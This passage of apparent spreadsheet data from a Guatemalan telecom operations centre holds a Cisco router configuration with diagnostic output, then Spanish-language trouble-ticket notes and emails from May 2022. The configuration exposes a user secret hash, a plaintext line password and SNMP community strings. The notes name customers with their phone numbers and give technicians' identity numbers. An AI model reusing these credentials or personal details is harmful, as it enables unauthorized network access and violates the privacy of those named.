  246ABA61 1A01DE35 C853D9D1 EAA35985 9AC182DC 1FBA4E8B 5FF74371 BBD4BD22
  16EEBAD3 26326391 A0551914 5D7EB5D5 9F5DBC8B EB863D5B 7C3DEBA1 18DF0D20
  2AD8FA60 96E97365 17353B1A F293D723 D9B2112D 4F227E24 541C3770 26D34053
  32264BCB 644075F2 138C29A6 6A90D0A1 F78FA1BF A086F0E4 572D3384 B73A45A3
  4FDC3F62 7AE346AA EF451F66 C1EE7FE8 BE99E47B 5AA6DE57 52D2B3E6 633AC9E9
  73C60CB6 EF0C686D 29090988 8064AB04 A7E3FC32 85700E77 7FB26CBA 9DA4D339
  61A1E1FF 02030100 01A35330 51300F06 03551D13 0101FF04 05300301 01FF301F
  0603551D 23041830 168014EB C3AE5816 E9E37D94 BD278203 2E19F152 BD3CF430
  1D060355 1D0E0416 0414EBC3 AE5816E9 E37D94BD 2782032E 19F152BD 3CF4300D
  06092A86 4886F70D 01010505 00038201 0100783E F37BBF4B 05E72065 049AF889
  BA0951F2 09592587 0887F341 A7D33054 E6130432 5938DCA8 7B4F3542 14E94711
  D1F330E6 E0AC791A 252D9016 FD3E4D93 231917EE C8AFD584 337823FC EAF925C3
  BC7A3951 1DB52519 D32B7143 4E8C8C81 0C7B0676 AA256FE6 EE4CBF19 10F95036
  ADD06D00 08F45AD7 DA4743E1 092DBA61 471C2EB8 FF01BA3B BAD46382 3623C43A
  DB4F9BE5 DA5DCF32 E1BE5AA0 641BD3E3 377459B5 B91D60C0 E23896B5 5648AD48
  F5D04907 B8229F5F 079BCFA9 1DB6294E 24A08DB7 7FE76B4D 8C525133 9F172622
  0F61C36F BF7FE58E 1559D76C C48C0A16 3A9BBAFB A4C7C14C 8F583A29 F480EEB5
  FA13E0A8 6BA82222 87D0A974 D9F54D91 8485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3310V8
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PRIVILEGE 15 SECRET 9 $9$QX3CV1S.BEGCYK$NFGBARWQQ/NOPYK04W1SC5UG54/GFJ4UPLEYR7U4O0G
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
CLASS-MAP MATCH-ANY H323-SIGN
 MATCH IP DSCP AF31
CLASS-MAP MATCH-ANY LLQ
 MATCH IP DSCP EF
CLASS-MAP MATCH-ANY RTP
 MATCH PROTOCOL RTP AUDIO
 MATCH ACCESS-GROUP 102
 MATCH ACCESS-GROUP 110
CLASS-MAP MATCH-ANY SIGNALING
 MATCH ACCESS-GROUP 101
!
POLICY-MAP 15MBPS
 CLASS CLASS-DEFAULT
  POLICE CIR 15360000 BC 2880000 BE 5760000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
POLICY-MAP MARK
 CLASS SIGNALING
  SET DSCP AF31
 CLASS RTP
  SET DSCP EF
POLICY-MAP CB
 CLASS LLQ
  PRIORITY PERCENT 20
 CLASS H323-SIGN
  BANDWIDTH PERCENT 5
 CLASS CLASS-DEFAULT
  FAIR-QUEUE
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO_CLARO
 IP ADDRESS 10.212.126.196 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN_GENESIS_EMPRESARIAL_TELEMAN
 BANDWIDTH 15360
 IP ADDRESS 10.72.108.173 255.255.255.248
 IP NBAR PROTOCOL-DISCOVERY
 SPEED 100
 NO NEGOTIATION AUTO
 SERVICE-POLICY INPUT 15MBPS
 SERVICE-POLICY OUTPUT CB
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN_CLIENTE
 IP ADDRESS 192.168.82.1 255.255.255.0
 IP NBAR PROTOCOL-DISCOVERY
 SERVICE-POLICY INPUT MARK
 SERVICE-POLICY OUTPUT 15MBPS
!
IP FORWARD-PROTOCOL ND
IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.72.108.169
!
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
!
ACCESS-LIST 101 REMARK VOIP_SIGN
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 2000 2002
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 1720
ACCESS-LIST 101 PERMIT TCP ANY ANY RANGE 11000 11999
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 2427
ACCESS-LIST 101 PERMIT TCP ANY ANY EQ 2428
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 1719
ACCESS-LIST 101 PERMIT UDP ANY ANY EQ 5060
ACCESS-LIST 102 REMARK VOIP_RTP
ACCESS-LIST 102 PERMIT UDP ANY ANY RANGE 16384 32767
ACCESS-LIST 110 REMARK CLIENTES_VOIP
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.82.246
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.82.247
ACCESS-LIST 110 PERMIT IP ANY HOST 192.168.82.248
!
!
SNMP-SERVER COMMUNITY GENESIS RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY MON002457D RO RD
!
!
CONTROL-PLANE
!
!
LINE CON 0
 PASSWORD TELGUA
 LOGIN LOCAL
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN
 PASSWORD TELGUA
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
GENESIS_245700130#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 201 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 201 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 204 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (4096 BYTES):
AY 19 01:07:41.143: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EOBC0, CHANGED STATE TO UP
*MAY 19 01:07:41.144: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LIIN0, CHANGED STATE TO UP
*MAY 19 01:07:42.237: %ONEP_BASE-6-SS_ENABLED: ONEP: SERVICE SET BASE WAS ENABLED BY DEFAULT
*MAY 19 01:07:44.430: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-197236263 HAS BEEN GENERATED OR IMPORTED BY CRYPTO CONFIG
*MAY 19 01:07:44.443: %SYS-2-PRIVCFG_DECRYPT: SUCCESSFULLY APPLY THE PRIVATE CONFIG FILE
*MAY 19 01:07:44.659: %AAA-5-USER_RESET: USER GESTIONIP FAILED ATTEMPTS RESET BY VTY0
*MAY 19 01:07:44.774: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 19 01:07:45.110: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 19 01:07:45.125: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/0, INTERFACES DISABLED
*MAY 19 01:07:45.125: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/1, INTERFACES DISABLED
*MAY 19 01:07:45.140: %SPA_OIR-6-OFFLINECARD: SPA (C1111-2X1GE) OFFLINE IN SUBSLOT 0/0
*MAY 19 01:07:45.148: %SPA_OIR-6-OFFLINECARD: SPA (C1111-ES-4) OFFLINE IN SUBSLOT 0/1
*MAY 19 01:07:45.191: %IOSXE_OIR-6-INSCARD: CARD (FP) INSERTED IN SLOT F0
*MAY 19 01:07:45.191: %IOSXE_OIR-6-ONLINECARD: CARD (FP) ONLINE IN SLOT F0
*MAY 19 01:07:45.203: %IOSXE_OIR-6-INSCARD: CARD (CC) INSERTED IN SLOT 0
*MAY 19 01:07:45.203: %IOSXE_OIR-6-ONLINECARD: CARD (CC) ONLINE IN SLOT 0
*MAY 19 01:07:45.296: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/0
*MAY 19 01:07:45.300: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/1
*MAY 19 01:07:45.431: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE [GIBRALTAR], ISR SOFTWARE (ARMV8EL_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.10.1B, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2018 BY CISCO SYSTEMS, INC.
COMPILED WED 12-DEC-18 01:49 BY MCPRE
*MAY 19 01:07:45.524: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
*MAY 19 01:07:46.279: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-197236263.SERVER HAS BEEN GENERATED OR IMPORTED BY CRYPTO-ENGINE
*MAY 19 01:07:46.753: %SNMP-5-COLDSTART: SNMP AGENT ON HOST GENESIS_245700130 IS UNDERGOING A COLD START
*MAY 19 01:07:50.320: %SPA_OIR-6-ONLINECARD: SPA (C1111-2X1GE) ONLINE IN SUBSLOT 0/0
*MAY 19 01:07:50.470: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*MAY 19 01:07:50.475: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/1, CHANGED STATE TO DOWN
*MAY 19 01:07:50.477: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
*MAY 19 01:07:50.483: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO DOWN
*MAY 19 01:07:50.727: %SPA_OIR-6-ONLINECARD: SPA (C1111-ES-4) ONLINE IN SUBSLOT 0/1
*MAY 19 01:07:51.564: %PNP-6-PNP_DISCOVERY_STOPPED: PNP DISCOVERY STOPPED (STARTUP CONFIG PRESENT)
*MAY 19 01:07:52.190: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 19 01:07:55.608: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO UP
*MAY 19 01:07:57.097: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 19 01:07:57.272: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO UP
*MAY 19 01:07:58.098: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 19 01:07:58.278: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 19 01:08:00.102: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED CISCO_IDEVID_SUDI HAS BEEN GENERATED OR IMPORTED BY PKI-SUDI
*MAY 19 01:08:00.128: %PKI-2-NON_AUTHORITATIVE_CLOCK: PKI FUNCTIONS CAN NOT BE INITIALIZED UNTIL AN AUTHORITATIVE TIME SOURCE, LIKE NTP, CAN BE OBTAINED.
*MAY 19 01:08:16.432: %CALL_HOME-6-CALL_HOME_ENABLED: CALL-HOME IS ENABLED BY SMART AGENT FOR LICENSING.
*MAY 19 01:08:16.433: %SMART_LIC-5-COMM_RESTORED: COMMUNICATIONS WITH THE CISCO SMART SOFTWARE MANAGER OR SATELLITE RESTORED
*MAY 21 05:10:49.506: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.72.108.169] [LOCALPORT: 23] AT 05:10:49 UTC SAT MAY 21 2022
GENESIS_245700130#
SHOW CLOCK
*05:11:10.988 UTC SAT MAY 21 2022
GENESIS_245700130#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.108.169          14   C4B8.B4DE.16B8  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.108.173           -   2CF8.9BB7.E180  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.168.82.1            -   2CF8.9BB7.E1F4  ARPA   VLAN1
INTERNET  192.168.82.250          1   94FF.3C1A.643E  ARPA   VLAN1
GENESIS_245700130#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN_GENESIS_EMPRESARIAL_TELEMAN
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        DOWN           DOWN
GI0/1/1                        DOWN           DOWN
GI0/1/2                        DOWN           DOWN
GI0/1/3                        UP             UP
LO5                            UP             UP       MONITOREO_CLARO
VL1                            UP             UP       LAN_CLIENTE
GENESIS_245700130#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.72.108.173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5              10.212.126.196  YES NVRAM  UP                    UP
VLAN1                  192.168.82.1    YES NVRAM  UP                    UP
GENESIS_245700130#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN FUND_GENESIS 10.72.108.173
  PING 10.72.108.173: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.108.173 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/7 MS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE FUND_GENESIS 10.72.108.173
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : FUND_GENESIS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.108.173/32  DIRECT  0    0                 0.0.0.0         VLANIF35			</t>
  </si>
  <si>
    <t>F4571880</t>
  </si>
  <si>
    <t>SE ESTA AL PENDIENTE, YA QUE PERSONAL DE BANCO AZTECA INDICA QUE AUN ESTAN REALIZANDO PRUEBAS CON LOS EQUIPOS</t>
  </si>
  <si>
    <t>F4571884</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 58589349 PARA SEGUIMIENTO, NO CONTESTA; SE HABLÓ CON MELVIN CHACÓN CLIENTE 30246026 INDICA QUE PR NO LABORA FINES DE SEMANA; PIDE SE CONTINÚE SEGUIMIENTO HASTA EL DÍA LUNES A LAS 12:00PM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 30246026 CONTESTA EL SEÑOR  EDWIN TUBAC QUIEN INDICA QUE SE QUEDE EN OBSERVACION PARA LAS 15 HRS **
ID 1001656421
**</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE CLAUDEL  AL 58589349 E INDICA QUE ESTAMOS LLAMANDO A OLOPA Y QUE AHI NO HA TENIDO INCONVENIENTES Y QUE ELLA NO HA REPORTADO NADA
ID 1001654531
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 RESPONDE EDWIN  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE, AUTORIZA CIERRE DE TICKET
-ID 1001719328</t>
  </si>
  <si>
    <t>F4571891</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 18:26
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB BCA JUTIAPA -G74-AG00013GT-GT0405F-NP [426100013T] - LINK DOWN || IMBBL003964
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO BIMBO INTERNACIONAL - GB BCA JUTIAPA -G74-AG00013GT, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA ENLACE OPERATIVO CON BGP ESTABLECIDO. POSIBLES TEMAS DE ENERGÍA EN SITIO</t>
  </si>
  <si>
    <t>F4571900</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23386565 EXT 94250 PARA SEGUIMIENTO, NO CONTESTA; SE LE ENVÍA CORREO SOLICITÁNDOLE APOYO:
ASUNTO: RE: AGE-334-COBAN-LA-PISTA | INTERFACE CLARO DOWN</t>
  </si>
  <si>
    <t>F4571903</t>
  </si>
  <si>
    <t>SE ESCALÓ CON LUIS BARRIOS/TÉCNICO 58262332 INDICA QUE YA ESTÁ EN SITIO HACIENDO LA REVISIÓN EN CONJUNTO CON GESTOR ASIGNADO, AVANCES EN 35/40 MINUTOS; SE BRINDAN AVANCES DEL TICKET A JOSÉ PALACIOS/CLIENTE DE LO ANTERIOR.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GEOVANI 54674858 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001827566 - 1001829353</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GEOVANI 54674858 MENCIONA QUE PERSISTE EL PROBLEMA, SE LE INDICA QUE A NIVEL DE CLARO UNICAMENTE SE LLEGA HASTA LA FO
CLIENTE MENCIONA QUE ESTARA VALIDANDO POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 1001807820 - 1001808168</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSÉ PALACIOS/CLIENTE; SE LE INDICA QUE SE DARÁ SEGUIMIENTO MAÑANA A LAS 08:00AM, DEBIDO A QUE PR SE RETIRÓ DE LABORES.</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSÉ PALACIOS/CLIENTE; SE LE INDICA QUE SE ESTÁ HACIENDO LA REVISIÓN DE LOS RADIOS CON APOYO DE BOTX.
SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: LUNES, 23 DE MAYO DE 2022 9:49
PARA: JOSE.PALACIOS@CWC.COM &lt;JOSE.PALACIOS@CWC.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 364100048T |COLUMBUS NETWORKS DE GUATEMALA LTDA. | 1RA. CALLE ZONA 1 SANMARCOS SAN LORENZO 15.03333N 91.73333W
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 364100048T |COLUMBUS NETWORKS DE GUATEMALA LTDA. | 1RA. CALLE ZONA 1 SANMARCOS SAN LORENZO 15.03333N 91.73333W
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
LUIS PEÑALONZO, JUAN HUMBERTO 197795 1985310601201
BARRIOS PEREZ, LUIS ARMANDO 520317 2392626541202
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4571906</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 55329047 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4571948</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX MORALES 36030171 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001545917</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR CHOJOLAN 59662021 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001546886</t>
  </si>
  <si>
    <t>F4571949</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 20 DE MAYO DE 2022 18:46PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE AFECTADO POR FALLA MASIVA PARA CLIENTE "CC_TYT_GT_ATM1477"
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTÁ SIENDO AFECTADO POR FALLA EN UN EQUIPO DE ACCESO, LE BRINDAREMOS MÁS INFORMACIÓN AL RESPECTO EN BREVE.
MASIVA: F4570721
TICKET: F4571949
ID: 806300455T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1477
UBICADO EN: 10 CALLE PRINCIPAL SAN ANDRES VILLA SECA, LA MAQUINA, RETALHULEU
SALUDOS</t>
  </si>
  <si>
    <t>F4571989</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 20 DE MAYO DE 2022 19:49PARA: USCTELECOMUNICACIONES@ICASA.COM.GT &lt;USCTELECOMUNICACIONES@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_INVERSIONES_CENTROAMERICANAS_GT_ATANAZIO_CORTIJO_Z1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1989
ID: 86100093T
IDENTIFICADOR DEL CLIENTE:  CC_INVERSIONES_CENTROAMERICANAS_GT_ATANAZIO_CORTIJO_Z12
UBICADO EN:  CALZADA ATANAZIO 19-97 ZONA 12 CENTRO EMPRESARIAL EL CORTIJO OF. 604 Y 605 GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4571995</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 37812415 PARA SEGUIMIENTO, NO CONTESTA; CENTRAL 55540267 TAMPOCO LO HACE; SE DEBE INTENTAR MÁS TARDE. ADICIONAL SE CONSULTA A GESTIÓN N1 VÍA SKYPE CÓMO VEN COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE CONFIRME SERVICIO HOY ENTRE LAS 12:00 Y 14:00 HORAS</t>
  </si>
  <si>
    <t>F4572012</t>
  </si>
  <si>
    <t>EN CRONO ANTERIOR SE INDICA QUE CLIENTE AUTORIZÓ CIERRE DEL TICKET, SE HACE RECORDATORIO DE NUEVO A CNOC CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4572042</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON GUADALUPE SÁNCHEZ/CLIENTE 00 525551745299 CALL ID 1001362348 SE LE INDICA QUE DEL LADO CLARO ENLACE OK, SE LE PIDE QUE NOS COMPARTA SUS PRUEBAS POR CORREO. INDICA QUE VERIFICARÁN LOS EQUIPOS DE SU CLIENTE FINAL PUES LO VEN AÚN CON CORTES, PIDE SE CIERRE TICKET.</t>
  </si>
  <si>
    <t>F4572050</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO POR PARTE DE CLARO ES NECESARIO SOLICITAR ALGUNA. EVIDENCIA DONDE SE OBSERVE LA CAIDA DEL SERVICIO O ALGUNA ALARMA QUE INDIQUE LA CAIDA.
&lt;HUEHGTHUN1T1A07A02EIM1&gt;PIN -C 1000 -S 1500 -B -M 50  -VPN INTERNET_GT_DEPTAL 10.105.6.43
  PING 10.105.6.43: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.6.43 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/20 MS
&lt;HUEHGTHUN1T1A07A02EIM1&gt;</t>
  </si>
  <si>
    <t>SE ENVIA CORRE CON VALIDACION DE SERVICIO OPERATIVO SE PORCEDE A DEJAR EN ETAP PENDIENTE CLEINTE YA QUE ESE ESPERAN PRUEBAS POR PARTE DEL CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 21:36
